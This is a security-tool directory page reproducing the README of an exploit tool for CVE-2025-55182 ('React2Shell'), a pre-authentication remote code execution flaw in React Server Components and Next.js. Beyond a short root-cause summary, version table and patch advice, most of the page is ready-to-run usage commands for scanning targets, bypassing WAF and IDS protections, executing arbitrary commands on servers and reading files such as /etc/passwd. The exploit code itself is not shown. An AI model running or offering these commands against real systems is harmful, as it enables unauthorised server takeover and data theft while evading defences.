Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55182 — Pre-authentication RCE exploit for CVE-2025-55182 (React2Shell) targeting React Server Components. Features scanning, OAST verification, WAF bypass, command execution, and file reading. | Kitploit
Tools/GitHubGitHub/sentinelxofficial/cve-2025-55182
ReconnaissanceVulnerability AnalysisExploitationIDS/IPS EvasionWeb Application ExploitationWAF BypassPenetration TestingPayload Development

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHub
sentinelxofficial/cve-2025-55182

CVE-2025-55182

Pre-authentication RCE exploit for CVE-2025-55182 (React2Shell) targeting React Server Components. Features scanning, OAST verification, WAF bypass, command execution, and file reading.

View Repository
1163 months agoNot yet reviewed

CVE-2025-55182 — React2Shell

Pre-authentication Remote Code Execution in React Server Components (RSC), Next.js, and related frameworks.

CVE CVSS Type Author


Overview

CVE-2025-55182 (also referred to as React2Shell) is a critical pre-authentication RCE vulnerability affecting the React Server Components (RSC) ecosystem. An unauthenticated attacker can fully compromise a vulnerable server with a single crafted HTTP POST request.

Technical Analysis

Root Cause

React Server Components uses a custom wire format called React Flight to serialize function references and module calls. The vulnerability exists in the payload decoding mechanism that processes incoming POST requests to RSC endpoints.

When the server receives a React Flight payload, it deserializes the content without adequate validation, trusting attacker-controlled $$typeof fields and module reference resolution. This allows an attacker to:

  1. Reference arbitrary Node.js built-in modules (e.g. child_process, fs, net)
  2. Chain function calls through the $F (function) type marker
  3. Execute arbitrary code under the Node.js server runtime

Affected Versions

PackageVulnerablePatched
react-server-dom-webpack19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-parcel19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-turbopack19.0.0 – 19.2.0≥ 19.2.1
next (13.x)13.3.0 – 13.5.x≥ 14.2.35
next (14.x)14.0.0 – 14.2.34≥ 14.2.35
next (15.x)15.0.0+ (see patch)patched releases

CVSS


CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical


Features

  • Scan – Detect vulnerable RSC endpoints and fingerprint Next.js/React versions.
  • Verify (OAST) – Send out‑of‑band payloads to confirm RCE via DNS/HTTP callbacks.
  • Bypass – Comprehensive WAF/IDS evasion: content-type mutations, payload encoding, header spoofing, path variants, and WAF payloads.
  • Execute – Run arbitrary system commands on the target (e.g., id, whoami).
  • Read – Read arbitrary files from the server (e.g., /etc/passwd, package.json).
  • JSON Output – Machine‑readable results for integration.

Installation

git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt

Usage

Basic Scan

python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json

Verify RCE with OAST

python3 poc.py -t https://target.com -m verify --oast your.oast.domain

Full Bypass Testing

python3 poc.py -t https://target.com -m bypass --verbose

Execute Commands

python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20

Read Files

python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"

Using a Proxy (e.g., Burp Suite)

python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080

File Structure

CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
    ├── __init__.py
    ├── payloads.py
    ├── scanner.py
    ├── bypass.py
    └── rce.py

Mitigation

Patch (Recommended)

npm install [email protected]
npm install [email protected] [email protected]

Temporary Workarounds

· Disable Server Functions ("use server") · WAF rules to block Content-Type: text/x-component · Network segmentation for RSC endpoints


References

· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182


Disclaimer: For authorized security testing only.

Author: SentinelX · https://t.me/SentinelXsecurity

Download Tool